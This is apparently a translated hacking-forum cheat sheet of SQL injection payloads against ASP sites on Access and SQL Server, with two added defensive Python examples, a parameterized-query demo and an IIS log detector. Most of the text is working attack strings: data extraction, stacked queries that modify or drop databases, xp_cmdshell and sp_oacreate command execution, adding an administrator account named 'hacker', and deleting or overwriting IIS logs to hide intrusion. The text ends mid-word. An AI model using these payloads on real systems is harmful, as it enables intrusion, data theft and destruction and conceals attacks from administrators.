Discuss this article with the author: http://bbs.2cto.com/read.php?tid=86980
SQL Injection Study Notes
1. Access
Determine whether the parameter is injectable:
http://www.targer.com/article.asp?id=6
http://www.targer.com/article.asp?id=6 and 1=1
http://www.targer.com/article.asp?id=6 and 1=2
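An added example, not from the original notes, of why the "and 1=1" / "and 1=2" probe above yields a true/false oracle when the id value is concatenated into the SQL text, and how a type check plus a bound parameter closes it. An in-memory SQLite table stands in for the Access or SQL Server table behind article.asp; the article rows and the function names are constructed for this illustration.

```python
import sqlite3

def make_db() -> sqlite3.Connection:
    """In-memory stand-in for the article table; rows are constructed sample data."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE article (id INTEGER PRIMARY KEY, title TEXT)")
    conn.executemany("INSERT INTO article VALUES (?, ?)",
                     [(5, "Notes"), (6, "SQL Injection Study Notes"), (7, "Misc")])
    return conn

def vulnerable_lookup(conn: sqlite3.Connection, raw_id: str) -> list:
    """Mirrors article.asp?id=<value> when <value> is pasted straight into the SQL text."""
    sql = "SELECT title FROM article WHERE id=" + raw_id
    return [row[0] for row in conn.execute(sql)]

def hardened_lookup(conn: sqlite3.Connection, raw_id: str) -> list:
    """Validate the type, then bind the value; the SQL text never changes."""
    if not raw_id.isdigit():
        raise ValueError("id must be a positive integer")
    return [row[0] for row in conn.execute(
        "SELECT title FROM article WHERE id=?", (int(raw_id),))]

def probe(lookup, conn: sqlite3.Connection) -> dict:
    """Send the three probe values from the notes and record what each one returns.
    Against the vulnerable lookup, 'and 1=1' matches the real row and 'and 1=2'
    returns nothing: that difference is the oracle. The hardened lookup rejects both."""
    results = {}
    for raw in ("6", "6 and 1=1", "6 and 1=2"):
        try:
            results[raw] = lookup(conn, raw)
        except ValueError as err:
            results[raw] = f"rejected: {err}"
    return results

if __name__ == "__main__":
    db = make_db()
    print("vulnerable:", probe(vulnerable_lookup, db))
    print("hardened:  ", probe(hardened_lookup, db))
```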
Determine the site's back-end database type:
http://www.targer.com/article.asp?id=6 and user>0
http://www.targer.com/article.asp?id=6 and (select count(*) from msysobjects)>0
Guessing tables, columns and values:
article.asp?id=6 and exists (select * from admin)
article.asp?id=6 and exists (select password from admin)
article.asp?id=6 and (select top N len(password) from admin)>x
article.asp?id=6 and (select top 1 asc(mid(password,N,1)) from admin)=97
Exporting a webshell through Access injection: none.
2. SQL Server
Determine whether the parameter is injectable:
http://www.targer.com/article.asp?id=6
http://www.targer.com/article.asp?id=6 and 1=1
http://www.targer.com/article.asp?id=6 and 1=2
http://www.targer.com/article.asp?action=value and 1=1
http://www.targer.com/article.asp?action=value and 1=2
Search field: % and 1=1
Search field: % and 1=2
Determine the database type:
http://www.targer.com/article.asp?id=6 and user>0
http://www.targer.com/article.asp?id=6 and (select count(*) from sysobjects)>0
Query the current user's data:
article.asp?id=6 having 1=1--
Columns in the current table:
article.asp?id=6 group by admin.username having 1=1--
article.asp?id=6 group by admin.username,admin.password having 1=1--
Arbitrary tables and columns:
and (select top 1 name from (select top N id,name from sysobjects where xtype=char(85)) T order by id desc)>1
and (select top 1 col_name(object_id('admin'),N) from sysobjects)>1
Extracting data from the database:
and (select top 1 password from admin where id=N)>1
Modify data in the database:
;update admin set password='oooooo' where username='xxx'
Add data to the database:
;insert into admin values('xxx','Oooooooo')--
Delete a database:
;drop database webdata
Get the current database user name: and user>0
Get the current database name: and db_name()>0
Get the database version: and (select @@version)>0
Determine whether stacked (multi-statement) queries are supported: ;declare @a int--
Determine whether subqueries are supported: and (select count(1) from [sysobjects])>=0
Extended stored procedure: exec master..xp_cmdshell
List the server's C: drive: ;exec master..xp_cmdshell 'dir c:'
Determine whether the extended stored procedure exists: and (select count(*) from master.dbo.sysobjects where xtype='X' and name='xp_cmdshell')>0
Restore the extended stored procedure: ;exec sp_addextendedproc 'xp_cmdshell','xplog70.dll'
Delete the extended stored procedure: ;exec sp_dropextendedproc 'xp_cmdshell'
MSSQL 2000 also provides OLE Automation procedures that give indirect access to OLE objects:
;declare @s int
;exec sp_oacreate 'wscript.shell',@s out
;exec master..sp_oamethod @s,'run',null,'cmd.exe /c dir c:'
Determine whether the current database user holds a high-privilege server role:
and 1=(select is_srvrolemember('sysadmin'))
and 1=(select is_srvrolemember('serveradmin'))
and 1=(select is_srvrolemember('setupadmin'))
and 1=(select is_srvrolemember('securityadmin'))
and 1=(select is_srvrolemember('diskadmin'))
and 1=(select is_srvrolemember('bulkadmin'))
Determine whether the current database user is db_owner:
and 1=(select is_member('db_owner'))
SQL Server keeps the list of all databases in master.dbo.sysdatabases; PUBLIC permission is enough to SELECT from it:
and (select top 1 name from master.dbo.sysdatabases order by dbid)>0
and (select top 1 name from master.dbo.sysdatabases where name not in (select top 1 name from master.dbo.sysdatabases order by dbid))>0
Delete log records:
;exec master.dbo.xp_cmdshell 'del c:\winnt\system32\logfiles\w3svc5\ex070606.log > c:\temp.txt'
Replace log records:
;exec master.dbo.xp_cmdshell 'copy c:\winnt\system32\logfiles\w3svc5\ex070404.log c:\winnt\system32\logfiles\w3svc5\ex070606.log > c:\temp.txt'
Obtain the web root path:
;declare @shell int
;exec master..sp_oacreate 'wscript.shell',@shell out
;exec master..sp_oamethod @shell,'run',null,'cmd.exe /c dir /s d:\index.asp > c:\log.txt'
Search with xp_cmdshell:
;exec master..xp_cmdshell 'dir /s d:\index.asp'
Commands for displaying the server's website configuration:
cmd /c cscript.exe c:\inetpub\adminscripts\adsutil.vbs enum w3svc/1/root
cmd /c cscript.exe c:\inetpub\adminscripts\adsutil.vbs enum w3svc/2/root
Use xp_regread, which only needs PUBLIC permission, to read the registry:
;exec master.dbo.xp_regread 'HKEY_LOCAL_MACHINE','SYSTEM\CurrentControlSet\Services\W3SVC\Parameters\Virtual Roots','/'
For more on advanced SQL Server techniques, see chapter 5 of Proficient Script Hacker by Zeng Yunhao.
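Added example (not part of the original notes): a detector for IIS W3C log lines that tags the request patterns catalogued in this section, from the boolean probes and sysobjects fingerprinting through stacked queries that reach xp_cmdshell, the sp_oa* OLE procedures and the is_srvrolemember role checks. The field order and the sample log lines are constructed for this example; real IIS logs declare their own #Fields order, so the column indices would need to follow that header.

```python
import re
from urllib.parse import unquote_plus

# Each tag names a technique from the notes; patterns run against the normalized query.
SIGNATURES = {
    "boolean-probe":  re.compile(r"\band\s+1\s*=\s*[12]\b"),
    "db-fingerprint": re.compile(r"\bm?sysobjects\b|\buser\s*>\s*0|@@version|\bdb_name\(\)"),
    "schema-walk":    re.compile(r"\bhaving\s+1\s*=\s*1|\bgroup\s+by\b|\bcol_name\(|\bobject_id\("),
    "stacked-exec":   re.compile(r";\s*(exec|declare|update|insert|drop)\b"),
    "xp-or-ole-proc": re.compile(r"\b(xp_cmdshell|xp_regread|xp_dirtree|xp_subdirs|"
                                 r"sp_oacreate|sp_oamethod|sp_addextendedproc)\b"),
    "role-check":     re.compile(r"\bis_(srvrolemember|member)\("),
}

def normalize(query: str) -> str:
    """Decode percent-encoding (twice, to catch double-encoded probes), lowercase,
    and collapse whitespace so 'and  1 = 1' and 'and+1%3D1' look the same."""
    text = unquote_plus(unquote_plus(query)).lower()
    return re.sub(r"\s+", " ", text)

def classify(query: str) -> set:
    """Return the set of technique tags whose pattern matches the query string."""
    norm = normalize(query)
    return {tag for tag, rx in SIGNATURES.items() if rx.search(norm)}

def scan_iis_log(log_text: str) -> list:
    """Return (client_ip, uri_stem, sorted_tags) for each line whose query matches.
    Assumed field order: date time c-ip cs-method cs-uri-stem cs-uri-query sc-status."""
    hits = []
    for line in log_text.splitlines():
        if not line or line.startswith("#"):
            continue                      # skip directives and blank lines
        parts = line.split()
        if len(parts) < 7:
            continue                      # malformed line, not enough fields
        c_ip, stem, query = parts[2], parts[4], parts[5]
        tags = classify(query)
        if tags:
            hits.append((c_ip, stem, sorted(tags)))
    return hits

# Constructed sample log: one legitimate request, then probes taken from the notes.
SAMPLE_LOG = """#Fields: date time c-ip cs-method cs-uri-stem cs-uri-query sc-status
2007-06-06 10:00:01 10.0.0.5 GET /article.asp id=6 200
2007-06-06 10:00:02 10.0.0.9 GET /article.asp id=6+and+1%3D1 200
2007-06-06 10:00:03 10.0.0.9 GET /article.asp id=6+and+(select+count(*)+from+sysobjects)%3E0 200
2007-06-06 10:00:04 10.0.0.9 GET /article.asp id=6+and+1%3D(select+is_srvrolemember('sysadmin')) 200
2007-06-06 10:00:05 10.0.0.9 GET /article.asp id=6;exec+master..xp_cmdshell+'dir+c:' 500
"""
```

Calling scan_iis_log(SAMPLE_LOG) flags the four requests from 10.0.0.9 and leaves the plain id=6 request alone; a sequence of boolean-probe hits followed by stacked-exec from one client is the progression the notes above walk through.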
3. DSqlHelper
Check the SYSADMIN permission:
and 1=(select is_srvrolemember('sysadmin'))
Likewise for serveradmin, setupadmin, securityadmin, diskadmin, bulkadmin, and db_owner.
Check xp_cmdshell (CMD command execution):
and 1=(select count(*) from master.dbo.sysobjects where name='xp_cmdshell')
Check xp_regread (registry read):
and 1=(select count(*) from master.dbo.sysobjects where name='xp_regread')
Check sp_makewebtask (backup function):
and 1=(select count(*) from master.dbo.sysobjects where name='sp_makewebtask')
Check sp_addextendedproc:
and 1=(select count(*) from master.dbo.sysobjects where name='sp_addextendedproc')
Check xp_subdirs (reads subdirectories):
and 1=(select count(*) from master.dbo.sysobjects where name='xp_subdirs')
Check xp_dirtree (reads subdirectories):
and 1=(select count(*) from master.dbo.sysobjects where name='xp_dirtree')
Modify content:
;update <table name> set <field>=<content> where 1=1
Test xp_cmdshell:
;exec master..xp_cmdshell 'dir c:'
Restore xp_cmdshell:
;exec master.dbo.sp_addextendedproc 'xp_cmdshell','xplog70.dll'
Use xp_cmdshell to add a user "hacker":
;exec master.dbo.xp_cmdshell 'net user hacker 123456 /add'
Use xp_cmdshell to add the user "hacker" to the administrators group:
;exec master.dbo.xp_cmdshell 'net localgroup administrators hacker /add'
Create table test:
;create table [dbo].[test]([dstr] [char](255));
Test:
And ex